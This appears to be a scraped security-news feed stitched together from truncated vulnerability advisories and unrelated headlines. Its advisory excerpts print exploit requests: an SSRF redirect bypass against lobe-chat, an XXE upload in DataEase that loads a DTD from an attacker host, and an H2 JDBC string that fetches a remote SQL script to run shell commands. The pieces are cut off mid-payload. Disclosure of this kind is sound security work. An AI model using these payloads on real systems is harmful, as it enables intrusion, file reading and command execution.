#git

### Summary SSRF protection implemented in https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts does not consider redirect and could be bypassed when attacker provides external malicious url which redirects to internal resources like private network or loopback address. ### PoC 1. Run lobe-chat in docker container. In my setup lobe-chat runs on 0.0.0.0:3210; 2. Create file dummy-server.js with the following content: ``` var http = require('http'); console.log("running server"); http.createServer(function (req, res) { console.log(req.url); res.writeHead(200, {'Content-Type': 'text/html'}); res.end(); }).listen(3001, 'localhost'); ``` And run ``` node dummy-server.js ``` as an example server inside of container [1] (or in containers private network). 3. Run in terminal to perform request to lobe-chat instance from [1] ``` curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: 0.0.0.0:3210' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0....

### Impact There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. 1. send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///...

### Impact An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string. request message: ``` POST /de2api/datasource/validate HTTP/1.1 Host: dataease.ubuntu20.vm User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close X-DE-TOKEN: jwt Content-Length: 209 Content-Type: application/json { "id": "", "name": "test", "type": "h2", "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ==" } ``` h2 data source connection string: ``` // configuration { "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://10.168.174.1:8000/poc.sql'](http://10.168.174.1:8000/poc.sql%27);", } ``` the content of poc.sql: ``` // poc.sql CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CA...

A background check service called MC2 Data has leaked information of over 100 million US citizens in an unprotected online database.

The $2.65B buy validates the growing importance of threat intelligence to enterprise security strategies.

Healthcare organizations face a 32% surge in cyberattacks, with sensitive patient data being sold on the Dark Web.…

Proof of concept python3 code that creates a malicious payload to exploit an arbitrary file write via directory traversal in Invesalius version 3.1. In particular the exploitation steps of this vulnerability involve the use of a specifically crafted .inv3 (a custom extension for InVesalius) that is indeed a tar file file which, once imported inside the victim's client application allows an attacker to write files and folders on the disk.

The Call For Papers for nullcon Goa 2025 is now open. Nullcon is an information security conference held in Goa, India. The focus of the conference is to showcase the next generation of offensive and defensive security technology. It will take place March 1st through the 2nd, 2025.

The internet has made breaking up a lot harder. The Modern Love Digital Breakup Checklist can help you separate locations, accounts, and more.

A cybercriminal posted free data sets on the infamous BreachForums, but are these actually worth looking at?